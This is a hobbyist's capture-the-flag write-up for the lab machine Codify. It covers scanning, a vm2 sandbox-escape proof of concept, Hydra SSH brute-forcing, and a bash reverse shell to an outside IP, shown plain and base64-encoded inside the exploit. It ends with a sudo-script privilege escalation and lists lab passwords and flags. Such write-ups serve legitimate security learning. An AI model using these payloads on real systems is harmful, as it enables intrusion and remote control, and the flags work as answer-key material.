This is my walkthrough on Codify

Initial Scan

sudo nmap -T4 -v 10.129.82.199
sudo nmap -T4 -Pn -p 22,80,3000 -sV -sC -v 10.129.82.199 -oA Codify

HTTP

Had to edit the host file to get the Webpage

Checking out their About Us page

Looking around for VM2 CVE’s, found this article on snyk about RCE with VM2 after seeing a couple others. Testing the other PoC’s I didn’t get anywhere until I found this one. We can run commands on the host bypassing the VM.

const { VM } = require("vm2");
const vm = new VM();

const code = `
  const err = new Error();
  err.name = {
    toString: new Proxy(() => "", {
      apply(target, thiz, args) {
        const process = args.constructor.constructor("return process")();
        throw process.mainModule.require("child_process").execSync("ls -al").toString();
      },
    }),
  };
  try {
    err.stack;
  } catch (stdout) {
    stdout;
  }
`;

console.log(vm.run(code)); // -> hacked

whoami shows us the svc user. Also looking at /etc/passwd we see an additional user, joshua

BruteForce

Trying to run Hydra against the user joshua for a password

hydra -l joshua -P /usr/share/wordlists/rockyou.txt -V ssh://10.129.82.199

joshua:spongebob1

Obtaining shell

Working to get a shall as svc. Looking around for reverse shell, I found PayloadAllTheThings.

bash -i >& /dev/tcp/10.10.14.53/1234 0>&1

Running it normally didn’t work so I encoded it

echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My8xMjM0IDA+JjE=' | base64 -d | bash"

Full command

const { VM } = require("vm2");
const vm = new VM();

const code = `
  const err = new Error();
  err.name = {
    toString: new Proxy(() => "", {
      apply(target, thiz, args) {
        const process = args.constructor.constructor("return process")();
        throw process.mainModule.require("child_process").execSync("echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My8xMjM0IDA+JjE=' | base64 -d | bash").toString();
      },
    }),
  };
  try {
    err.stack;
  } catch (stdout) {
    stdout;
  }
`;

console.log(vm.run(code)); // -> hacked

Foothold

We have shell as svc

Seeing what permissions we have

User Flag

After getting into shell from the SVC user, I got Joshuas password with hydra.

User flag: c53cdd4688463871ba3f4020ab6f3ccb

Priv Esc

We have run the note of “User joshua may run the following commands on codify: (root) /opt/scripts/mysql-backup.sh” So looking at the shell file

Running that as root as get

Get PSPY Initiate another SSH session. Get pspy64 onto the target machine, run it, then run the /opt/scripts/mysql-backup.sh script

Root pass: kljh12k3jhaskjh12kjh3

Root flag: 4e43f866588b3b3433196af3cef8b768